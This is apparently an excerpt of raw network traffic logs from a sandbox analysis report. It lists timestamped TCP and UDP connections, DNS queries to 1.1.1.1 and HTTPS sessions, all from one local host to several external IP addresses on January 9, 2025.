Jan 9, 2025 14:56:56.534121990 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.534146070 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.537439108 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:56.537587881 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.537611008 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:56.537631035 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.537656069 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.537786007 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.537959099 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:57.550725937 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:57.550805092 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:57.550976992 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:57.551001072 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:57.551017046 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:57.551023960 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:57.778671026 CET	50097	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:57.778711081 CET	443	50097	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:57.778805971 CET	50097	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:57.779155970 CET	50097	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:57.779161930 CET	443	50097	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:58.283356905 CET	443	50097	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:58.283516884 CET	50097	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:58.284884930 CET	50097	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:58.284893990 CET	443	50097	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:58.285159111 CET	443	50097	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:58.285979986 CET	50097	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:58.285999060 CET	50097	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:58.286006927 CET	443	50097	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:58.534312963 CET	443	50097	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:58.534377098 CET	443	50097	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:58.534460068 CET	50097	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:58.534557104 CET	50097	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:58.534569979 CET	443	50097	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:58.534583092 CET	50097	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:58.534590006 CET	443	50097	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:58.662796974 CET	50098	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:58.662823915 CET	443	50098	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:58.662921906 CET	50098	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:58.663219929 CET	50098	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:58.663235903 CET	443	50098	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:59.120058060 CET	443	50098	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:59.120213985 CET	50098	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:59.121576071 CET	50098	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:59.121587038 CET	443	50098	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:59.121994972 CET	443	50098	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:59.122812033 CET	50098	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:59.122844934 CET	50098	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:59.122849941 CET	443	50098	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:59.427026987 CET	443	50098	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:59.427093983 CET	443	50098	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:59.427143097 CET	50098	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:59.427234888 CET	50098	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:59.427253962 CET	443	50098	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:59.427267075 CET	50098	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:59.427273035 CET	443	50098	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:59.521440029 CET	50099	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:59.521493912 CET	443	50099	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:59.521598101 CET	50099	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:59.521863937 CET	50099	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:59.521872044 CET	443	50099	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:00.009495974 CET	443	50099	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:00.009627104 CET	50099	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:00.010795116 CET	50099	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:00.010802984 CET	443	50099	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:00.011042118 CET	443	50099	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:00.011720896 CET	50099	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:00.011739016 CET	50099	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:00.011745930 CET	443	50099	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:00.334218979 CET	443	50099	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:00.334287882 CET	443	50099	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:00.334352016 CET	50099	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:00.334440947 CET	50099	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:00.334455013 CET	443	50099	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:00.334475040 CET	50099	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:00.334480047 CET	443	50099	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:01.076344967 CET	50100	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:01.076400042 CET	443	50100	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:01.076636076 CET	50100	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:01.077080965 CET	50100	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:01.077095032 CET	443	50100	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:01.559791088 CET	443	50100	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:01.559865952 CET	50100	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:01.561598063 CET	50100	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:01.561608076 CET	443	50100	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:01.561892033 CET	443	50100	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:01.562902927 CET	50100	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:01.562902927 CET	50100	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:01.562947035 CET	443	50100	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:01.563237906 CET	50100	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:01.563272953 CET	443	50100	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:01.563358068 CET	50100	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:01.563402891 CET	443	50100	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:01.563535929 CET	50100	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:01.607372046 CET	443	50100	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:01.963416100 CET	443	50100	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:01.963496923 CET	443	50100	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:01.963716984 CET	50100	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:01.963716984 CET	50100	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:01.963762045 CET	443	50100	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:01.963783979 CET	50100	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:01.963793993 CET	443	50100	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:02.842740059 CET	50101	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:02.842782021 CET	443	50101	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:02.842947006 CET	50101	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:02.843333006 CET	50101	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:02.843348980 CET	443	50101	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:03.322451115 CET	443	50101	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:03.322773933 CET	50101	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:03.323909998 CET	50101	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:03.323924065 CET	443	50101	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:03.324208975 CET	443	50101	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:03.329839945 CET	50101	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:03.329927921 CET	50101	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:03.329977989 CET	443	50101	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:03.330094099 CET	50101	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:03.330136061 CET	443	50101	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:03.331367016 CET	50101	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:03.331430912 CET	443	50101	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:03.564028978 CET	50055	443	192.168.2.10	204.79.197.219
Jan 9, 2025 14:57:03.564044952 CET	443	50055	204.79.197.219	192.168.2.10
Jan 9, 2025 14:57:03.657799959 CET	50056	443	192.168.2.10	204.79.197.219
Jan 9, 2025 14:57:03.657815933 CET	443	50056	204.79.197.219	192.168.2.10
Jan 9, 2025 14:57:03.808270931 CET	443	50101	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:03.808335066 CET	443	50101	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:03.808410883 CET	50101	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:03.808657885 CET	50101	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:03.808657885 CET	50101	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:03.808680058 CET	443	50101	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:03.808692932 CET	443	50101	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:03.893598080 CET	50102	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:03.893656015 CET	443	50102	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:03.893765926 CET	50102	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:03.894066095 CET	50102	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:03.894085884 CET	443	50102	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:04.370881081 CET	443	50102	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:04.371072054 CET	50102	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:04.372237921 CET	50102	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:04.372246027 CET	443	50102	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:04.372487068 CET	443	50102	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:04.373301029 CET	50102	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:04.419332027 CET	443	50102	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:04.426646948 CET	50102	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:04.426666975 CET	443	50102	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:04.727956057 CET	443	50102	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:04.728245020 CET	50102	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:04.728245020 CET	50102	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:57:04.728259087 CET	443	50102	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:04.728287935 CET	443	50102	172.67.174.91	192.168.2.10
Jan 9, 2025 14:57:13.166915894 CET	50053	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:57:13.166950941 CET	443	50053	23.219.82.80	192.168.2.10
Jan 9, 2025 14:57:13.167000055 CET	50054	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:57:13.167026043 CET	443	50054	23.219.82.80	192.168.2.10
Jan 9, 2025 14:57:13.167119980 CET	50059	443	192.168.2.10	23.219.82.16
Jan 9, 2025 14:57:13.167125940 CET	443	50059	23.219.82.16	192.168.2.10
Jan 9, 2025 14:57:13.167537928 CET	50104	443	192.168.2.10	104.126.116.58
Jan 9, 2025 14:57:13.167576075 CET	443	50104	104.126.116.58	192.168.2.10
Jan 9, 2025 14:57:13.167639017 CET	50104	443	192.168.2.10	104.126.116.58
Jan 9, 2025 14:57:13.167860985 CET	50104	443	192.168.2.10	104.126.116.58
Jan 9, 2025 14:57:13.167871952 CET	443	50104	104.126.116.58	192.168.2.10
Jan 9, 2025 14:57:13.625930071 CET	443	50104	104.126.116.58	192.168.2.10
Jan 9, 2025 14:57:13.626301050 CET	50104	443	192.168.2.10	104.126.116.58
Jan 9, 2025 14:57:13.626318932 CET	443	50104	104.126.116.58	192.168.2.10
Jan 9, 2025 14:57:13.627444029 CET	443	50104	104.126.116.58	192.168.2.10
Jan 9, 2025 14:57:13.627512932 CET	50104	443	192.168.2.10	104.126.116.58
Jan 9, 2025 14:57:13.627862930 CET	50104	443	192.168.2.10	104.126.116.58
Jan 9, 2025 14:57:13.627927065 CET	443	50104	104.126.116.58	192.168.2.10
Jan 9, 2025 14:57:13.671324968 CET	50104	443	192.168.2.10	104.126.116.58
Jan 9, 2025 14:57:13.671338081 CET	443	50104	104.126.116.58	192.168.2.10
Jan 9, 2025 14:57:13.717685938 CET	50104	443	192.168.2.10	104.126.116.58
Jan 9, 2025 14:57:13.907258034 CET	50105	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:57:13.907306910 CET	443	50105	131.253.33.203	192.168.2.10
Jan 9, 2025 14:57:13.907377958 CET	50105	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:57:13.907557964 CET	50106	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:57:13.907588005 CET	50105	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:57:13.907604933 CET	443	50105	131.253.33.203	192.168.2.10
Jan 9, 2025 14:57:13.907668114 CET	443	50106	131.253.33.203	192.168.2.10
Jan 9, 2025 14:57:13.907730103 CET	50106	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:57:13.907835007 CET	50106	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:57:13.907859087 CET	443	50106	131.253.33.203	192.168.2.10
Jan 9, 2025 14:57:14.482403994 CET	443	50106	131.253.33.203	192.168.2.10
Jan 9, 2025 14:57:14.482701063 CET	50106	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:57:14.482748985 CET	443	50106	131.253.33.203	192.168.2.10
Jan 9, 2025 14:57:14.483122110 CET	443	50106	131.253.33.203	192.168.2.10
Jan 9, 2025 14:57:14.483381033 CET	50106	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:57:14.483447075 CET	443	50106	131.253.33.203	192.168.2.10
Jan 9, 2025 14:57:14.504705906 CET	443	50105	131.253.33.203	192.168.2.10
Jan 9, 2025 14:57:14.504935026 CET	50105	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:57:14.504956007 CET	443	50105	131.253.33.203	192.168.2.10
Jan 9, 2025 14:57:14.505265951 CET	443	50105	131.253.33.203	192.168.2.10
Jan 9, 2025 14:57:14.505568981 CET	50105	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:57:14.505628109 CET	443	50105	131.253.33.203	192.168.2.10
Jan 9, 2025 14:57:14.533472061 CET	50106	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:57:14.548908949 CET	50105	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:57:32.743884087 CET	443	50104	104.126.116.58	192.168.2.10
Jan 9, 2025 14:57:32.743989944 CET	443	50104	104.126.116.58	192.168.2.10
Jan 9, 2025 14:57:32.744086027 CET	50104	443	192.168.2.10	104.126.116.58
Jan 9, 2025 14:57:48.570591927 CET	50055	443	192.168.2.10	204.79.197.219
Jan 9, 2025 14:57:48.570605993 CET	443	50055	204.79.197.219	192.168.2.10
Jan 9, 2025 14:57:48.663186073 CET	50056	443	192.168.2.10	204.79.197.219
Jan 9, 2025 14:57:48.663209915 CET	443	50056	204.79.197.219	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 14:55:40.647638083 CET	138	138	192.168.2.10	192.168.2.255
Jan 9, 2025 14:55:59.287492037 CET	62629	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:55:59.306039095 CET	53	62629	1.1.1.1	192.168.2.10
Jan 9, 2025 14:56:08.720741034 CET	61537	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:08.720920086 CET	60140	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:08.727864027 CET	53	60140	1.1.1.1	192.168.2.10
Jan 9, 2025 14:56:09.803009987 CET	49948	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:09.803148985 CET	54827	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:11.051146030 CET	63580	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:11.051325083 CET	62340	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:11.054975986 CET	57936	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:11.055180073 CET	55512	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:11.064973116 CET	53	57936	1.1.1.1	192.168.2.10
Jan 9, 2025 14:56:11.064985037 CET	53	55512	1.1.1.1	192.168.2.10
Jan 9, 2025 14:56:11.075835943 CET	58708	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:11.076277971 CET	59182	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:11.084100008 CET	53	59182	1.1.1.1	192.168.2.10
Jan 9, 2025 14:56:11.087137938 CET	63080	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:11.087274075 CET	65280	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:11.093852043 CET	53	65280	1.1.1.1	192.168.2.10
Jan 9, 2025 14:56:13.633943081 CET	63520	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:13.634124994 CET	56474	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:13.634737968 CET	57195	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:13.635729074 CET	61240	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:13.641638994 CET	53	63520	1.1.1.1	192.168.2.10
Jan 9, 2025 14:56:13.641835928 CET	53	56474	1.1.1.1	192.168.2.10
Jan 9, 2025 14:56:13.642323017 CET	53	57195	1.1.1.1	192.168.2.10
Jan 9, 2025 14:56:13.643388987 CET	53	61240	1.1.1.1	192.168.2.10
Jan 9, 2025 14:56:13.660232067 CET	54728	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:13.660392046 CET	50457	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:13.667459965 CET	53	54728	1.1.1.1	192.168.2.10
Jan 9, 2025 14:56:13.668018103 CET	53	50457	1.1.1.1	192.168.2.10
Jan 9, 2025 14:56:14.196863890 CET	59111	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:14.197105885 CET	61940	53	192.168.2.10	1.1.1.1
Jan 9, 2025 14:56:14.205298901 CET	53	59111	1.1.1.1	192.168.2.10
Jan 9, 2025 14:56:14.205686092 CET	53	61940	1.1.1.1	192.168.2.10
Jan 9, 2025 14:56:14.496892929 CET	60230	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.536072969 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.797849894 CET	60230	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.840945005 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.946633101 CET	443	60230	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.946650028 CET	443	60230	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.947760105 CET	443	60230	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.947977066 CET	443	60230	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.947993040 CET	443	60230	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.952805042 CET	60230	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.954225063 CET	60230	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.954395056 CET	60230	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.954724073 CET	60230	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.954909086 CET	60230	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.955024004 CET	60230	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.955127954 CET	60230	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.995515108 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.998696089 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.998718023 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.998806953 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.998820066 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.000749111 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.000919104 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.001024961 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.001673937 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.002042055 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.047871113 CET	443	60230	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.047888041 CET	443	60230	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.047904015 CET	443	60230	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.047914982 CET	443	60230	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.047924042 CET	443	60230	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.048217058 CET	60230	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:15.048285961 CET	60230	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:15.050064087 CET	443	60230	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.050944090 CET	443	60230	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.051594973 CET	443	60230	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.051800966 CET	60230	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:15.051975012 CET	443	60230	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.051995993 CET	443	60230	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.053147078 CET	60230	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:15.098041058 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.098066092 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.098376036 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.098397970 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.098550081 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.098550081 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.100212097 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.100279093 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.101838112 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.141947985 CET	443	60230	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:15.172054052 CET	60230	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:15.192714930 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.248250961 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.538969040 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.543224096 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.543756962 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.554704905 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.576842070 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.577348948 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.750444889 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.750669956 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.750998974 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.751009941 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.751019001 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.751090050 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.751478910 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.752279043 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.753015041 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.753694057 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.765568972 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.766057014 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.766083002 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.766330957 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.849596024 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.849864960 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:15.947935104 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.949105978 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.950062037 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:15.950308084 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:16.130601883 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:16.130724907 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:16.230881929 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:16.232842922 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:16.232852936 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:16.233206987 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:16.264127016 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:16.264235973 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:16.360112906 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:16.363552094 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:16.363992929 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:16.365504980 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:16.622814894 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:16.622919083 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:16.721031904 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:16.724790096 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:16.727046013 CET	443	57112	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:16.766393900 CET	57112	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:17.096494913 CET	49811	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:17.099109888 CET	49811	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:17.099451065 CET	49811	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:17.099678993 CET	49811	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:17.099796057 CET	49811	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:17.099925041 CET	49811	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:17.110548973 CET	49811	443	192.168.2.10	162.159.61.3
